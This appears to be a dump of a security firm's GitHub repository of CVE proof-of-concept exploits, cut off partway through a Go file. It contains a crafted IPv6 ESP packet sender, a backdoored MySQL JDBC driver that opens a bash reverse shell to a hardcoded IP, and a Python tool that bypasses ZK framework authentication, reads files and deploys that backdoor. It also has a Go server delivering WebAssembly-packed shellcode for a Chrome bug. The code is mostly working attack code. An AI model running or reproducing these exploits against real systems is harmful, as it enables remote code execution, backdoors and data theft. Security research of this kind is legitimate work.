├── .DS_Store ├── CVE-2022-34718 └── poc.cpp ├── CVE-2022-36537 ├── Driver.java ├── chromedriver ├── cve-2022-36537.py ├── mysql-connector-java-5.1.48.jar └── requirements.txt ├── CVE-2022-3723 ├── 01.html ├── Readme.md ├── arr.html ├── exp.html ├── go.mod ├── go.sum └── mainHttps.go ├── CVE-2023-23410 └── CVE-2023-23410_poc.c ├── CVE-2023-28231 └── CVE-2023-28231-DHCP-VUL-PoC.cpp ├── CVE-2023-29336 └── poc.cpp ├── CVE-2023-41047 └── CVE-2023-41047.go ├── CVE-2024-24919 └── exp.py └── README.md /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/numencyber/Vulnerability_PoC/c2de4c67548bbd9eefd26b4a4ac9e04799b3fb0b/.DS_Store -------------------------------------------------------------------------------- /CVE-2022-34718/poc.cpp: -------------------------------------------------------------------------------- 1 | //////////////////////////////////////////////// 2 | // ScannerDemo.cpp文件 3 | 4 | #include "../common/initsock.h" 5 | 6 | #include 7 | #include 8 | 9 | #include "ntddndis.h" 10 | 11 | #include "protoutils.h" 12 | #include "ProtoPacket.h" 13 | #include 14 | #include "Iphlpapi.h" 15 | #pragma comment(lib, "Iphlpapi.lib") 16 | #pragma comment(lib, "Bcrypt.lib") 17 | 18 | #include "../common/comm.h" 19 | 20 | 21 | DWORD WINAPI SendThread(LPVOID lpParam); 22 | BOOL GetGlobalData(); 23 | 24 | u_char g_ucLocalMac[6]; 25 | DWORD g_dwGatewayIP; 26 | DWORD g_dwLocalIP; 27 | DWORD g_dwMask; 28 | 29 | CInitSock theSock; 30 | BCRYPT_ALG_HANDLE m_hAesAlg; 31 | BCRYPT_KEY_HANDLE m_hKey; 32 | PBYTE m_pbKeyObject; 33 | PBYTE m_pbIV; 34 | 35 | //Handle for Hash 36 | BCRYPT_HASH_HANDLE m_hHash; 37 | PBYTE m_pbHashObject; 38 | BCRYPT_ALG_HANDLE m_hHashAlg; 39 | BYTE rgbHash[0x14]; 40 | 41 | UCHAR str_SHA1_key[] = 42 | "\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90"; 43 | UINT32 spi = htonl(0x861b157c); 44 | void SHA1(PUCHAR str_data, DWORD len) 45 | { 46 | 47 | 
BCRYPT_KEY_HANDLE hKey = NULL; 48 | DWORD cbHashObject, cbResult, temp = 0; 49 | 50 | DWORD cbData = 0; 51 | BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8); 52 | // Determine the size of the Hash object 53 | BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0); 54 | m_pbHashObject = (PBYTE)malloc(cbHashObject); 55 | // Create the Hash object 56 | BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0); 57 | // Hash the data 58 | BCryptHashData(m_hHash, (PBYTE)str_data, len, 0); 59 | // Finish the hash 60 | BCryptFinishHash(m_hHash, rgbHash, 0x14, 0); 61 | return ; 62 | 63 | } 64 | BOOL GetGlobalData() 65 | { 66 | PIP_ADAPTER_INFO pAdapterInfo = NULL; 67 | ULONG ulLen = 0; 68 | 69 | ::GetAdaptersInfo(pAdapterInfo, &ulLen); 70 | pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen); 71 | 72 | if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS) 73 | { 74 | if (pAdapterInfo != NULL) 75 | { 76 | memcpy(g_ucLocalMac, pAdapterInfo->Address, 6); 77 | g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String); 78 | g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String); 79 | g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String); 80 | } 81 | } 82 | ::GlobalFree(pAdapterInfo); 83 | return TRUE; 84 | } 85 | int main() 86 | { 87 | GetGlobalData(); 88 | if (!ProtoStartService()) 89 | { 90 | printf(" ProtoStartService() failed %d \n", ::GetLastError()); 91 | return -1; 92 | } 93 | HANDLE hControlDevice = ProtoOpenControlDevice(); 94 | if (hControlDevice == INVALID_HANDLE_VALUE) 95 | { 96 | printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError()); 97 | ProtoStopService(); 98 | return -1; 99 | } 100 | CPROTOAdapters adapters; 101 | if (!adapters.EnumAdapters(hControlDevice)) 102 | { 103 | printf(" Enume adapter failed \n"); 104 | ProtoStopService(); 105 | return -1; 106 | } 107 | 108 | CAdapter adapter; 
109 | if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE)) 110 | { 111 | printf(" OpenAdapter failed \n"); 112 | ProtoStopService(); 113 | return -1; 114 | } 115 | 116 | adapter.SetFilter( // NDIS_PACKET_TYPE_PROMISCUOUS| 117 | NDIS_PACKET_TYPE_DIRECTED | 118 | NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST); 119 | 120 | 121 | UCHAR ipv6_ESP_Fragment_1[] = 122 | "\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00" 123 | "\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85" 124 | "\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5" 125 | "\x70\x83\x16\x6f\xef\x6b" 126 | 127 | "\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq 128 | "\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d" 129 | "\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00" 130 | "\x01\x02\x02\x2c"//ESP tail 131 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC; 132 | UCHAR ipv6_ESP_Fragment_2[] = 133 | "\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00" 134 | "\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85" 135 | "\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5" 136 | "\x70\x83\x16\x6f\xef\x6b" 137 | 138 | "\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq 139 | "\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d" 140 | "\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00" 141 | "\x01\x02\x02\x2c"//ESP tail 142 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC; 143 | 144 | 145 | memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4); 146 | SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c); 147 | memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c); 148 | 149 | memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4); 150 | SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c); 151 | memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c); 152 | 153 | adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1); 154 | 155 | adapter.SendData(ipv6_ESP_Fragment_2, 
sizeof(ipv6_ESP_Fragment_2)-1); 156 | 157 | ProtoStopService(); 158 | 159 | return 0; 160 | } 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /CVE-2022-36537/Driver.java: -------------------------------------------------------------------------------- 1 | package com.mysql.jdbc; 2 | 3 | import java.sql.*; 4 | import java.util.*; 5 | import java.util.logging.Logger; 6 | 7 | /* 8 | author: Bearcat of www.numencyber.com 9 | desc : Mysql jdbc backdoor driver 10 | */ 11 | public class Driver implements java.sql.Driver { 12 | static { 13 | String winCmd = "calc"; 14 | String linuxCmd = "bash -i >& /dev/tcp/192.168.1.3/2022 0>&1"; 15 | 16 | String[] cmds = null; 17 | 18 | if (System.getProperty("os.name").toLowerCase().contains("win")) { 19 | cmds = new String[]{"cmd.exe", "/c", winCmd}; 20 | } else { 21 | cmds = new String[]{"/bin/bash", "-c", linuxCmd}; 22 | } 23 | 24 | try { 25 | Runtime.getRuntime().exec(cmds); 26 | } catch (Exception ignored) { 27 | // do nothing... 
28 | } 29 | } 30 | 31 | @Override 32 | public Connection connect(String url, Properties info) throws SQLException { 33 | return null; 34 | } 35 | 36 | @Override 37 | public boolean acceptsURL(String url) throws SQLException { 38 | return false; 39 | } 40 | 41 | @Override 42 | public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException { 43 | return new DriverPropertyInfo[0]; 44 | } 45 | 46 | @Override 47 | public int getMajorVersion() { 48 | return 0; 49 | } 50 | 51 | @Override 52 | public int getMinorVersion() { 53 | return 0; 54 | } 55 | 56 | @Override 57 | public boolean jdbcCompliant() { 58 | return false; 59 | } 60 | 61 | @Override 62 | public Logger getParentLogger() throws SQLFeatureNotSupportedException { 63 | return null; 64 | } 65 | } -------------------------------------------------------------------------------- /CVE-2022-36537/chromedriver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/numencyber/Vulnerability_PoC/c2de4c67548bbd9eefd26b4a4ac9e04799b3fb0b/CVE-2022-36537/chromedriver -------------------------------------------------------------------------------- /CVE-2022-36537/cve-2022-36537.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # coding: utf-8 3 | """ 4 | @File : cve-2022-36537.py 5 | @Time : 2022/11/11 23:34 6 | @Author : Bearcat of www.numencyber.com 7 | @Version : 1.0 8 | @Desc : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution. 
9 | """ 10 | 11 | import sys 12 | import subprocess 13 | import os 14 | import warnings 15 | import re 16 | 17 | import zipfile 18 | import shutil 19 | 20 | import requests 21 | from requests_toolbelt import MultipartEncoder 22 | import urllib3 23 | 24 | from selenium import webdriver 25 | from rich import print as rprint 26 | 27 | import argparse 28 | 29 | urllib3.disable_warnings() 30 | 31 | # proxy = { 32 | # "http": "http://127.0.0.1:8080" 33 | # } 34 | 35 | proxy = {} 36 | 37 | 38 | # https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/ 39 | def bypass_auth1(target): 40 | warnings.warn("Discard. The bypass auch2 function is simpler to obtain dtid and cookies.", DeprecationWarning) 41 | rprint("[italic green][*] Bypass authentication.") 42 | try: 43 | opt = webdriver.ChromeOptions() 44 | opt.add_argument('--headless') 45 | opt.add_argument('--ignore-certificate-errors') 46 | driver = webdriver.Chrome(executable_path='./chromedriver', options=opt) 47 | driver.get(target) 48 | cookie_str = "JSESSIONID=" + driver.get_cookie("JSESSIONID")['value'] 49 | dtid = driver.execute_script(""" 50 | for (var dtid in zk.Desktop.all) 51 | return dtid 52 | """) 53 | return dtid, cookie_str 54 | except Exception as e: 55 | rprint("[italic red][-] Bypass authentication failed. {0}".format(e)) 56 | exit() 57 | 58 | 59 | def bypass_auth2(target): 60 | rprint("[italic green][*] Bypass authentication.") 61 | uri = "{0}/login.zul".format(target) 62 | try: 63 | result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy) 64 | cookie_str = result.headers['Set-Cookie'].split(";")[0] 65 | r = u"dt:'(.*?)',cu:" 66 | regex = re.compile(r) 67 | dtid = regex.findall(result.text)[0] 68 | return dtid, cookie_str 69 | except Exception as e: 70 | rprint("[italic red][-] Bypass authentication failed. 
{0}".format(e)) 71 | exit() 72 | 73 | 74 | def forward_request(target, next_uri, cookie_str, uuid, dtid): 75 | uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, uuid, dtid) 76 | param = {"nextURI": (None, next_uri)} 77 | headers = {"Cookie": cookie_str} 78 | data = MultipartEncoder(param, boundary="----WebKitFormBoundaryCs6yB0zvpfSBbYEp") 79 | headers["Content-Type"] = data.content_type 80 | try: 81 | result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy) 82 | return result 83 | except Exception as e: 84 | rprint("[italic red][-] Forward request failed. {0}".format(e)) 85 | exit() 86 | 87 | 88 | def read_file(target, filename): 89 | # get login_dtid 90 | login_dtid, cookie_str = bypass_auth2(target) 91 | rprint("[italic green][*] Start reading the file:") 92 | result = forward_request(target, filename, cookie_str, "101010", login_dtid) 93 | return "-----file start-----\n{0}\n-----file end-----".format(result.text) 94 | 95 | 96 | def deploy_jdbc_backdoor(target): 97 | rprint( 98 | "[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.") 99 | play_again = input("Whether to continue? 
(y/n):").lower() 100 | if play_again[0] != "y": 101 | exit() 102 | # get login_dtid 103 | login_dtid, cookie_str = bypass_auth2(target) 104 | rprint("[italic green][*] Start deploying the jdbc backdoor.") 105 | build_jdbc_backdoor() 106 | # database_dtid and mysql_driver_upload_button_id 107 | uri = "/Configuration/database-drivers.zul" 108 | result = forward_request(target, uri, cookie_str, "101010", login_dtid) 109 | r1 = u"{dt:'(.*?)',cu:" 110 | regex = re.compile(r1) 111 | database_dtid = regex.findall(result.text)[0] 112 | r1 = u"'zul.wgt.Button','(.*?)'," 113 | regex = re.compile(r1) 114 | mysql_driver_upload_button_id = regex.findall(result.text)[0] 115 | 116 | uri = "/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D".format( 117 | database_dtid, mysql_driver_upload_button_id) 118 | result = forward_request(target, uri, cookie_str, "101010", login_dtid) 119 | 120 | # file_upload_dlg_id and file_upload_id 121 | r1 = u"zul.fud.FileuploadDlg','(.*?)'," 122 | regex = re.compile(r1) 123 | file_upload_dlg_id = regex.findall(result.text)[0] 124 | 125 | r1 = u"zul.wgt.Fileupload','(.*?)'," 126 | regex = re.compile(r1) 127 | file_upload_id = regex.findall(result.text)[0] 128 | 129 | uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, file_upload_id, database_dtid) 130 | upload_jdbc_backdoor(uri, cookie_str) 131 | 132 | uri = "/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D".format( 133 | database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id) 134 | forward_request(target, uri, cookie_str, "101010", login_dtid) 135 | 136 | uri = 
"/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D".format(database_dtid, 137 | file_upload_dlg_id) 138 | forward_request(target, uri, cookie_str, "101010", login_dtid) 139 | 140 | 141 | def upload_jdbc_backdoor(uri, cookie_str): 142 | rprint("[italic green][*] Upload the database driver.") 143 | headers = {"Cookie": cookie_str} 144 | files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')} 145 | try: 146 | requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy) 147 | except Exception as e: 148 | rprint("[italic red][-] Upload the database driver failed. {0}".format(e)) 149 | exit() 150 | 151 | 152 | def build_jdbc_backdoor(): 153 | rprint("[italic green][*] Compile java code.") 154 | java_cmd = 'javac -source 1.5 -target 1.5 Driver.java' 155 | popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 156 | popen.stdout.read() 157 | 158 | tmp_path = 'jdbc_jar' 159 | os.mkdir(tmp_path) 160 | with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf: 161 | unzf.extractall("jdbc_jar") 162 | unzf.close() 163 | os.remove('jdbc_jar/com/mysql/jdbc/Driver.class') 164 | shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/') 165 | 166 | with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf: 167 | for root, dirs, files in os.walk(tmp_path): 168 | relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep 169 | for filename in files: 170 | zf.write(os.path.join(root, filename), relative_root + filename) 171 | zf.close() 172 | shutil.rmtree(tmp_path) 173 | 174 | rprint("[italic green][*] Build jdbc backdoor success.") 175 | 176 | 177 | def banner(): 178 | rprint("[italic white]CVE-2022-36537:\n\tZK framework authentication bypass") 179 | rprint("[italic white]\tConnectWise r1Soft server backup manager remote code execution") 180 | 181 | 182 | def parse_args(): 183 | parser = 
argparse.ArgumentParser(prog='cve-2022-36537', 184 | formatter_class=argparse.RawTextHelpFormatter, 185 | description='author: Bearcat of www.numencyber.com', 186 | usage='cve-2022-36537.py [options]') 187 | parser.add_argument('-u', '--url', type=str, default='', help='target url') 188 | parser.add_argument('-r', '--read', type=str, default='', help='reading the file') 189 | parser.add_argument('-b', '--build', action="store_true", help='build jdbc backdoor') 190 | parser.add_argument('-d', '--deploy', action="store_true", help='deploying the jdbc backdoor') 191 | 192 | if len(sys.argv) == 1: 193 | sys.argv.append('-h') 194 | 195 | args = parser.parse_args() 196 | return args 197 | 198 | 199 | if __name__ == '__main__': 200 | banner() 201 | args = parse_args() 202 | if args.url and args.read: 203 | print(read_file(args.url, args.read)) 204 | exit() 205 | if args.build: 206 | build_jdbc_backdoor() 207 | exit() 208 | if args.url and args.deploy: 209 | deploy_jdbc_backdoor(args.url) 210 | exit() 211 | -------------------------------------------------------------------------------- /CVE-2022-36537/mysql-connector-java-5.1.48.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/numencyber/Vulnerability_PoC/c2de4c67548bbd9eefd26b4a4ac9e04799b3fb0b/CVE-2022-36537/mysql-connector-java-5.1.48.jar -------------------------------------------------------------------------------- /CVE-2022-36537/requirements.txt: -------------------------------------------------------------------------------- 1 | requests==2.28.1 2 | requests_toolbelt==0.10.1 3 | rich==12.6.0 4 | selenium==4.7.2 5 | urllib3==1.25.3 6 | -------------------------------------------------------------------------------- /CVE-2022-3723/01.html: -------------------------------------------------------------------------------- 1 | 2 |
3 | 4 | -------------------------------------------------------------------------------- /CVE-2022-3723/Readme.md: -------------------------------------------------------------------------------- 1 | exploit of CVE-2022-3723 2 | 3 | based on google's public poc -------------------------------------------------------------------------------- /CVE-2022-3723/arr.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2022-3723/exp.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2022-3723/go.mod: -------------------------------------------------------------------------------- 1 | module httpsServer 2 | 3 | go 1.20 4 | 5 | require github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 6 | -------------------------------------------------------------------------------- /CVE-2022-3723/go.sum: -------------------------------------------------------------------------------- 1 | github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI= 2 | github.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM= 3 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 4 | github.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs= 5 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 6 | github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk= 7 | gopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U= 8 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 9 | -------------------------------------------------------------------------------- 
/CVE-2022-3723/mainHttps.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "errors" 5 | "flag" 6 | "fmt" 7 | "github.com/bytecodealliance/wasmtime-go/v8" 8 | "io/ioutil" 9 | "log" 10 | "math" 11 | "net/http" 12 | "os" 13 | "path" 14 | "path/filepath" 15 | "regexp" 16 | "strconv" 17 | "strings" 18 | ) 19 | 20 | var globalFloat float64 = -1 21 | 22 | var wasm_code = ` 23 | (module 24 | (func $f (export "f") (param i64) 25 | (call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12 12EB9060B0C03148 26 | (call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B 0BEB9090008B4865 27 | (call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B 0BEB909018408B48 28 | (call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B 0BEB909030408B48 29 | (call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B 0BEBc08b48C08548 30 | (call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B 0BEB000002D1840F 31 | (call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B 0BEB9000320033BA 32 | (call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B 0BEB909020E2C148 33 | (call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B 0BEB90004C0045B9 34 | (call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B 0BEBdb8b48CA0148 35 | (call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B 0BEB004E0052B941 36 | (call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B 0BEB909020E1C149 37 | (call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B 0BEB900045004BB9 38 | (call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B 0BEBc98b48C90149 39 | (call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B 0BEB004C004CB841 40 | (call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B 0BEB909020E0C149 41 | (call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 
90 EB 0B 0BEB900044002EB9 42 | (call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B 0BEBf68b48C80149 43 | (call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B 0BEB909040488B48 44 | (call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B 0BEB904774C98548 45 | (call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B 0BEB90347509394C 46 | (call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B 0BEB207508513948 47 | (call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B 0BEB22741041394C 48 | (call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B 0BEBC08548008B48 49 | (call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B 0BEB10488B488C75 50 | (call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B 0BEB90903C416348 51 | (call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B 0BEBC80148C98949 52 | (call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B 0BEB000000880548 53 | (call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B 0BEB9090C031108B 54 | (call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B 0BEBff8b48CA0148 55 | (call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B 0BEB909018528B44 56 | (call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B 0BEB909020428B44 57 | (call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B 0BEB9090245A8B44 58 | (call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B 0BEB1c528bC80149 59 | (call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B 0BEBCA0148CB0149 60 | (call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B 0BEBc98b4dD28545 61 | (call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B 0BEB00000092840F 62 | (call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B 0BEB90506C6175BB 63 | (call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B 
0BEB909020E3C148 64 | (call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B 0BEB9074726956BE 65 | (call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B 0BEB088B41F30148 66 | (call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B 0BEB4674091C394A 67 | (call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B 0BEB04C08349C0FF 68 | (call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B 0BEB90C572D03944 69 | (call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B 0BEBd28b4dC3C031 70 | (call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B 0BEB904304B70F41 71 | (call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B 0BEB9008245C8B48 72 | (call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B 0BEBC8014C82048B 73 | 74 | (call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B 0BEB909090C68948 75 | (call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B 0BEB9000002000BA 76 | (call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B 0BEB00000040B841 77 | (call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B 0BEB90AABBCCDDB8 78 | (call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B 0BEB909050F0014C 79 | (call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B 0BEB909090C18948 80 | (call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B 0BEB000019000548 81 | (call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B 0BEB90E6FFC18949 82 | )) 83 | ` 84 | 85 | func faviconHandler(w http.ResponseWriter, r *http.Request) { 86 | http.ServeFile(w, r, "favicon.ico") 87 | } 88 | 89 | func check(e error) { 90 | if e != nil { 91 | panic(e) 92 | } 93 | } 94 | func isValidAddress(str string) bool { 95 | match, _ := regexp.MatchString("^[0-9a-fA-F]{1,8}$", str) 96 | return match 97 | } 98 | 99 | func processShellcodeAddr(str string, code string) (string, error) { 100 | if 
!isValidAddress(str) { 101 | fmt.Println("ShellcodeAddr地址无效") 102 | return "", errors.New("ShellcodeAddr地址无效") 103 | } 104 | code = strings.Replace(code, "0x0BEB90AABBCCDDB8", "0x0BEB90"+str+"B8", 1) 105 | return code, nil 106 | } 107 | func fileServerHandler(w http.ResponseWriter, r *http.Request) { 108 | fmt.Println(r.URL.Path) 109 | p := "." + r.URL.Path 110 | extName := path.Ext(r.URL.Path) 111 | // 获取路径的最后一部分 112 | base := path.Base(r.URL.Path) 113 | // 检查它是否全部由0-9或a-f组成 114 | match, _ := regexp.MatchString("^[0-9a-f]+$", base) 115 | if match { 116 | fmt.Println("Matched string:", base) 117 | // 解析十六进制字符串为整数 118 | i, err := strconv.ParseInt(base, 16, 64) 119 | if err != nil { 120 | log.Println("Error parsing hex string:", err) 121 | http.ServeFile(w, r, p) 122 | return 123 | } 124 | // 获得i的高4个字节并减去0x10 125 | high4Bytes := int64(uint64(i)>>32) - 0x10 126 | 127 | // 确保减法操作不会使值变为负数 128 | if high4Bytes < 0 { 129 | high4Bytes = 0 130 | } 131 | 132 | // 用新值替换i的高4个字节 133 | i = (high4Bytes << 32) | (i & 0xFFFFFFFF) 134 | // 解析整数为浮点数 135 | globalFloat = math.Float64frombits(uint64(i)) 136 | // 打印浮点数 137 | fmt.Println("Float: ", globalFloat) 138 